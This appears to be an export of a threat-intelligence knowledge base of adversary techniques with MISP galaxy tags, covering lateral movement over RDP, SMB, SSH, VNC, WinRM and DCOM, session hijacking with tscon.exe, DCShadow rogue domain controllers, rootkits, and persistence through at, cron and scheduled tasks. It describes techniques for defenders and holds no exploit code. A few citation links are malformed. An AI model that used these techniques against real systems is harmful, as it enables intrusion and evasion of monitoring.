Installation of many remote access software may also include persistence (e.g., the software’s installation routine creates a [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)).

The tag is: misp-galaxy:technique="Remote Access Software"

Cloud Services

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.

Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5)), using commands such as <code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud CLI.

In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) instead of a username and password.

The tag is: misp-galaxy:technique="Cloud Services"

Direct Cloud VM Connections

Adversaries may leverage [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5), such as Azure Serial Console<sup>[[Azure Serial Console](https://app.tidalcyber.com/references/fd75d136-e818-5233-b2c2-5d8ed033b9e6)]</sup>, AWS EC2 Instance Connect<sup>[[EC2 Instance Connect](https://app.tidalcyber.com/references/deefa5b7-5a28-524c-b500-bc5574aa9920)]</sup><sup>[[lucr-3: Getting SaaS-y in the cloud](https://app.tidalcyber.com/references/033e7c95-cded-5e51-9a9f-1c6038b0509f)]</sup>, and AWS System Manager.<sup>[[AWS System Manager](https://app.tidalcyber.com/references/a7813928-4351-54c5-a64e-61bd4689e93b)]</sup>.

Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access.

Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.<sup>[[SIM Swapping and Abuse of the Microsoft Azure Serial Console](https://app.tidalcyber.com/references/c596a0e0-6e9c-52e4-b1bb-9c0542f960f2)]</sup> These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50)).

The tag is: misp-galaxy:technique="Direct Cloud VM Connections"

Distributed Component Object Model

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.<sup>[[Fireeye Hunting COM June 2019](https://app.tidalcyber.com/references/84311e46-cea1-486a-a737-c4a4946ab837)]</sup><sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup>

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.<sup>[[Microsoft Process Wide Com Keys](https://app.tidalcyber.com/references/749d83a9-3c9f-42f4-b5ed-fa775b079716)]</sup> By default, only Administrators may remotely activate and launch COM objects through DCOM.<sup>[[Microsoft COM ACL](https://app.tidalcyber.com/references/88769217-57f1-46d4-977c-2cb2969db437)]</sup>

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications<sup>[[Enigma Outlook DCOM Lateral Movement Nov 2017](https://app.tidalcyber.com/references/48c8b8c4-1ce2-4fbc-a95d-dc8b39304200)]</sup> as well as other Windows objects that contain insecure methods.<sup>[[Enigma MMC20 COM Jan 2017](https://app.tidalcyber.com/references/ecc1023d-ef37-46e3-8dce-8fd5bb6a10dc)]</sup><sup>[[Enigma DCOM Lateral Movement Jan 2017](https://app.tidalcyber.com/references/62a14d3b-c61b-4c96-ad28-0519745121e3)]</sup> DCOM can also execute macros in existing documents<sup>[[Enigma Excel DCOM Sept 2017](https://app.tidalcyber.com/references/953dc856-d906-4d87-a421-4e708f30208c)]</sup> and may also invoke [Dynamic Data Exchange](https://app.tidalcyber.com/technique/82497cfd-725e-42f8-aaa7-4e20878a6a13) (DDE) execution directly through a COM created instance of a Microsoft Office application<sup>[[Cyberreason DCOM DDE Lateral Movement Nov 2017](https://app.tidalcyber.com/references/6edb3d7d-6b74-4dc4-a866-b81b19810f97)]</sup>, bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). <sup>[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>

The tag is: misp-galaxy:technique="Distributed Component Object Model"

Remote Desktop Protocol

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup>

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba) or [Terminal Services DLL](https://app.tidalcyber.com/technique/ae967542-1f37-4eea-993d-fff3867f2aea) for Persistence.<sup>[[Alperovitch Malware](https://app.tidalcyber.com/references/b6635fd7-40ec-4481-bb0a-c1d3391854a7)]</sup>

The tag is: misp-galaxy:technique="Remote Desktop Protocol"

SMB/Windows Admin Shares

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely access a networked system over SMB,<sup>[[Wikipedia Server Message Block](https://app.tidalcyber.com/references/3ea03c65-12e0-4e28-bbdc-17bb8c1e1831)]</sup> to interact with systems using remote procedure calls (RPCs),<sup>[[TechNet RPC](https://app.tidalcyber.com/references/7eaa0fa8-953a-482e-8f6b-02607e928525)]</sup> transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) and certain configuration and patch levels.<sup>[[Microsoft Admin Shares](https://app.tidalcyber.com/references/68d23cb0-b812-4d77-a3aa-34e24a923a50)]</sup>

The tag is: misp-galaxy:technique="SMB/Windows Admin Shares"

SSH

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.

The tag is: misp-galaxy:technique="SSH"

VNC

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.<sup>[[The Remote Framebuffer Protocol](https://app.tidalcyber.com/references/4c75a00d-aa90-4260-ab7a-2addc17d1728)]</sup>

VNC differs from [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system’s authentication, but it can be configured to use credentials specific to VNC.<sup>[[MacOS VNC software for Remote Desktop](https://app.tidalcyber.com/references/c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af)]</sup><sup>[[VNC Authentication](https://app.tidalcyber.com/references/de6e1202-19aa-41af-8446-521abc20200d)]</sup>

Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.<sup>[[Hijacking VNC](https://app.tidalcyber.com/references/7a58938f-058b-4c84-aa95-9c37dcdda1fb)]</sup><sup>[[macOS root VNC login without authentication](https://app.tidalcyber.com/references/4dc6ea85-a41b-4218-a9ae-e1eea841f2f2)]</sup><sup>[[VNC Vulnerabilities](https://app.tidalcyber.com/references/3ec5440a-cb3b-4aa9-8e0e-0f92525ef51c)]</sup><sup>[[Offensive Security VNC Authentication Check](https://app.tidalcyber.com/references/90a5ab3c-c2a8-4b02-9bd7-628672907737)]</sup><sup>[[Attacking VNC Servers PentestLab](https://app.tidalcyber.com/references/f953ea41-f9ca-4f4e-a46f-ef1d2def1d07)]</sup><sup>[[Havana authentication bug](https://app.tidalcyber.com/references/255181c2-b1c5-4531-bc16-853f21bc6435)]</sup>

The tag is: misp-galaxy:technique="VNC"

Windows Remote Management

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).<sup>[[Microsoft WinRM](https://app.tidalcyber.com/references/ddbe110c-88f1-4774-bcb9-cd18b6218fc4)]</sup> It may be called with the winrm command or by any number of programs such as PowerShell.<sup>[[Jacobsen 2014](https://app.tidalcyber.com/references/f9ca049c-5cab-4d80-a84b-1695365871e3)]</sup> WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation]([MSDN WMI(https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)]</sup>

The tag is: misp-galaxy:technique="Windows Remote Management"

Remote Services

Adversaries may use [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).<sup>[[SSH Secure Shell](https://app.tidalcyber.com/references/ac5fc103-1946-488b-8af5-eda0636cbdd0)]</sup><sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup> They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as [Software Deployment Tools](https://app.tidalcyber.com/technique/1bcf9fb5-6848-44d9-b394-ffbd3c357058) and other administrative programs) may utilize [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://app.tidalcyber.com/technique/af7afc1e-3374-4d1c-917b-c47c305274f5) to send the screen and control buffers and [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) for secure file transfer.<sup>[[Remote Management MDM macOS](https://app.tidalcyber.com/references/e5f59848-7014-487d-9bae-bed81af1b72b)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup><sup>[[Apple Remote Desktop Admin Guide 3.3](https://app.tidalcyber.com/references/c57c2bba-a398-4e68-b2a7-fddcf0740b61)]</sup> Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.<sup>[[FireEye 2019 Apple Remote Desktop](https://app.tidalcyber.com/references/bbc72952-988e-4c3c-ab5e-75b64e9e33f5)]</sup><sup>[[Lockboxx ARD 2019](https://app.tidalcyber.com/references/159f8495-5354-4b93-84cb-a25e56fcff3e)]</sup><sup>[[Kickstart Apple Remote Desktop commands](https://app.tidalcyber.com/references/f26542dd-aa61-4d2a-a05a-8f9674b49f82)]</sup>

The tag is: misp-galaxy:technique="Remote Services"

RDP Hijacking

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).<sup>[[TechNet Remote Desktop Services](https://app.tidalcyber.com/references/b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd)]</sup>

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.<sup>[[RDP Hijacking Korznikov](https://app.tidalcyber.com/references/8877e1f3-11e6-4ae0-adbd-c9b98b07ee25)]</sup> This can be done remotely or locally and with active or disconnected sessions.<sup>[[RDP Hijacking Medium](https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup> It can also lead to [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.<sup>[[Kali Redsnarf](https://app.tidalcyber.com/references/459fcde2-7ac3-4640-a5bc-cd8750e54962)]</sup>

The tag is: misp-galaxy:technique="RDP Hijacking"

SSH Hijacking

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.<sup>[[Slideshare Abusing SSH](https://app.tidalcyber.com/references/4f63720a-50b6-4eef-826c-71ce8d6e4bb8)]</sup><sup>[[SSHjack Blackhat](https://app.tidalcyber.com/references/64f94126-de4c-4204-8409-d26804f32cff)]</sup><sup>[[Clockwork SSH Agent Hijacking](https://app.tidalcyber.com/references/4a4026e3-977a-4f25-aeee-794947f384b2)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>

[SSH Hijacking](https://app.tidalcyber.com/technique/45f2613d-35dd-4ddc-a222-30e9c0dd6bf6) differs from use of [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

The tag is: misp-galaxy:technique="SSH Hijacking"

Remote Service Session Hijacking

Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.

Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://app.tidalcyber.com/technique/c992f340-645d-412a-b509-3cbaf94919b0) differs from use of [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) because it hijacks an existing session rather than creating a new session using [Valid Accounts]([RDP Hijacking Medium(https://app.tidalcyber.com/references/0a615508-c155-4004-86b8-916bbfd8ae42)]</sup><sup>[[Breach Post-mortem SSH Hijack](https://app.tidalcyber.com/references/f1d15b92-8840-45ae-b23d-0cba20fc22cc)]</sup>

The tag is: misp-galaxy:technique="Remote Service Session Hijacking"

Remote System Discovery

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or <code>net view</code> using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).

Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.

Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

The tag is: misp-galaxy:technique="Remote System Discovery"

Replication Through Removable Media

Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.

Mobile devices may also be used to infect PCs with malware if connected via USB.<sup>[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)]</sup> This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.<sup>[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)]</sup><sup>[[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)]</sup> For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

The tag is: misp-galaxy:technique="Replication Through Removable Media"

Resource Hijacking

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup> Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup> Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]</sup>

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.<sup>[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]</sup>

Adversaries may also use malware that leverages a system’s network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.<sup>[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)]</sup> Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.<sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>

The tag is: misp-galaxy:technique="Resource Hijacking"

Rogue Domain Controller

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup>

The tag is: misp-galaxy:technique="Rogue Domain Controller"

Rootkit

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. <sup>[[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)]</sup>

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). <sup>[[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)]</sup> Rootkits have been seen for Windows, Linux, and Mac OS X systems. <sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup> <sup>[[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]</sup>

The tag is: misp-galaxy:technique="Rootkit"

At

Adversaries may abuse the [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82)'s [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) in Windows environments, using [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.

On Linux and macOS, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860). If the <code>at.deny</code> exists and is empty, global use of [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at]([Linux at(https://app.tidalcyber.com/references/3e3a84bc-ab6d-460d-8abc-cafae6eaaedd)]</sup>

Adversaries may use [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393). [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) can also be abused to conduct remote [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) as part of [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and/or to run a process under the context of a specified account (such as SYSTEM).

In Linux environments, adversaries may also abuse [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) may also be used for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) if the binary is allowed to run as superuser via <code>sudo</code>.<sup>[[GTFObins at](https://app.tidalcyber.com/references/3fad6618-5a85-4f7a-be2b-0600269d7768)]</sup>

The tag is: misp-galaxy:technique="At"

Container Orchestration Job

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.<sup>[[Kubernetes Jobs](https://app.tidalcyber.com/references/21a4388d-dbf8-487b-a2a2-67927b099e4a)]</sup><sup>[[Kubernetes CronJob](https://app.tidalcyber.com/references/354d242c-227e-4827-b559-dc1650d37acd)]</sup> An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.<sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>

The tag is: misp-galaxy:technique="Container Orchestration Job"

Cron

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup> The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393).

The tag is: misp-galaxy:technique="Cron"

Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility could also be abused by adversaries (ex: [At](https://app.tidalcyber.com/technique/6051e618-c476-41db-8b0b-0aef9d2bbbf7)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

